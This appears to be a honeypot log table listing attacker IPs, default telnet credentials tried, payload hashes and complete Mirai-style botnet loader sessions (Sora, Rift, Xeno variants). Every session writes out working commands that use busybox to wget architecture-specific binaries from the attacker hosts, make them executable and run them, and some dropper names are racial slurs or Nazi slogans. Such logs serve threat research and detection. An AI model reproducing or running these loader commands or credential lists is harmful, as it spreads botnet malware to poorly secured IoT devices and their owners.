| IP address |
User name |
Password |
SHA256 of the payload file |
 89.42.133.29
| default | OxhlwSG8 | 5658170b840f8ea82cb40209f2fdd3fbad2af418eb4dab2817d3c596737f16dd |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf DestoryTheNet dropper
/bin/busybox cp /bin/busybox DestoryTheNet; >DestoryTheNet; /bin/busybox chmod 777 DestoryTheNet; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://89.42.133.29:80/bins/sora.mpsl -O - > DestoryTheNet; /bin/busybox chmod 777 DestoryTheNet; /bin/busybox SORA
./DestoryTheNet Revolution.loader.mpsl; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >DestoryTheNet; /bin/busybox SORA |
 45.35.0.213
| admin | meinsm | f13b8f557f56b9fcf7ee04d32ca86e4fc94c44c00e96bcbd16066c522e1b6573 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf zoneniggr sosa
/bin/busybox cp /bin/busybox zoneniggr; >zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox RIFT
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox RIFT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox RIFT
/bin/busybox wget http://45.35.0.213:80/bins/rift.arm -O - > zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
./zoneniggr telnet.arm; /bin/busybox SIX
/bin/busybox rm -rf sosa zoneniggr
/bin/busybox cp /bin/busybox zoneniggr; >zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox RIFT
/bin/busybox wget http://45.35.0.213:80/bins/rift.arm7 -O - > zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
./zoneniggr telnet.arm7; /bin/busybox SIX
/bin/busybox rm -rf sosa; >zoneniggr; /bin/busybox RIFT |
 213.202.211.188
| root | root | f79d84c2daa4d96fdc9172e8a1190c4523f070a4d4bfc600d303f1dc7d6509c8 |
linuxshell
sh
shell
enable
system
hostname UNSTABLE_5161
/bin/busybox UNSTABLE
/bin/busybox ps; /bin/busybox UNSTABLE
/bin/busybox cat /proc/mounts; /bin/busybox UNSTABLE
/bin/busybox echo -e '\x75\x6e\x35\x74\x34\x38\x6c\x33/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x75\x6e\x35\x74\x34\x38\x6c\x33/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x75\x6e\x35\x74\x34\x38\x6c\x33/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x75\x6e\x35\x74\x34\x38\x6c\x33/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x75\x6e\x35\x74\x34\x38\x6c\x33' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x75\x6e\x35\x74\x34\x38\x6c\x33/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x75\x6e\x35\x74\x34\x38\x6c\x33/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x75\x6e\x35\x74\x34\x38\x6c\x33/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x75\x6e\x35\x74\x34\x38\x6c\x33/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox UNSTABLE
cd /
/bin/busybox cp /bin/echo .xxdrx00x00x; >.xxdrx00x00x; /bin/busybox chmod 777 .xxdrx00x00x; /bin/busybox UNSTABLE
/bin/busybox cat /bin/echo
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://213.202.211.188:80/bins/x9.x86 -O - > .xxdrx00x00x; /bin/busybox chmod 777 .xxdrx00x00x; /bin/busybox UNSTABLE
./.xxdrx00x00x x86; /bin/busybox ELBATSNU
/bin/busybox UNSTABLE |
45.35.0.213 | user | | 0868fccd69d46eb14a1f4c8a1cbfeb1c54396bd6dca74cffb8c90045caad3a9e |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf zoneniggr sosa
/bin/busybox cp /bin/busybox zoneniggr; >zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox RIFT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox RIFT
/bin/busybox wget http://45.35.0.213:80/bins/rift.x86 -O - > zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
./zoneniggr telnet.x86; /bin/busybox SIX
/bin/busybox rm -rf sosa; >zoneniggr; /bin/busybox RIFT |
45.35.0.213 | support | 123456 | 718ab2165931937093b8d6cb5b2defff54df7ed6fc84188698726162206536c4 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf zoneniggr sosa
/bin/busybox cp /bin/busybox zoneniggr; >zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox RIFT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox RIFT
/bin/busybox wget http://45.35.0.213:80/bins/rift.ppc -O - > zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
./zoneniggr telnet.ppc; /bin/busybox SIX
/bin/busybox rm -rf sosa; >zoneniggr; /bin/busybox RIFT |
192.119.111.230 | root | realtek | 4adf6be0758289029a5e9f5dc780717d00c4f759712b55b3c0eb0297233fdd59 |
enable
system
shell
sh
linuxshell
bah
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf 93OfjHZ2z 41JxrNJ6k
/bin/busybox cp /bin/busybox 93OfjHZ2z; >93OfjHZ2z; /bin/busybox chmod 777 93OfjHZ2z; /bin/busybox HEIL
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HEIL
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox HEIL
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HEIL
/bin/busybox wget http://192.119.111.230:80/xenobins/arm.xeno.ak -O - > 93OfjHZ2z; /bin/busybox chmod 777 93OfjHZ2z; /bin/busybox HEIL
./93OfjHZ2z telnet; /bin/busybox HITLER
/bin/busybox rm -rf 41JxrNJ6k 93OfjHZ2z
/bin/busybox cp /bin/busybox 93OfjHZ2z; >93OfjHZ2z; /bin/busybox chmod 777 93OfjHZ2z; /bin/busybox HEIL
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HEIL
/bin/busybox wget http://192.119.111.230:80/xenobins/arm7.xeno.ak -O - > 93OfjHZ2z; /bin/busybox chmod 777 93OfjHZ2z; /bin/busybox HEIL
./93OfjHZ2z telnet; /bin/busybox HITLER
/bin/busybox rm -rf 41JxrNJ6k; >93OfjHZ2z; /bin/busybox HEIL |
 51.79.84.171
| admin | | d08e756c9fbf1c9cb0cf667c0bcf314d9af5e68440b83783327039a3cbeb80b1 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://51.79.84.171:80/bins/sora.x86 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.x86; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
51.79.84.171 | root | zlxx. | 45cc405eac018abc3d476267592e23866d614d23a5edbbb27956e4e49f5c22fc |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://51.79.84.171:80/bins/sora.spc -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.spc; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |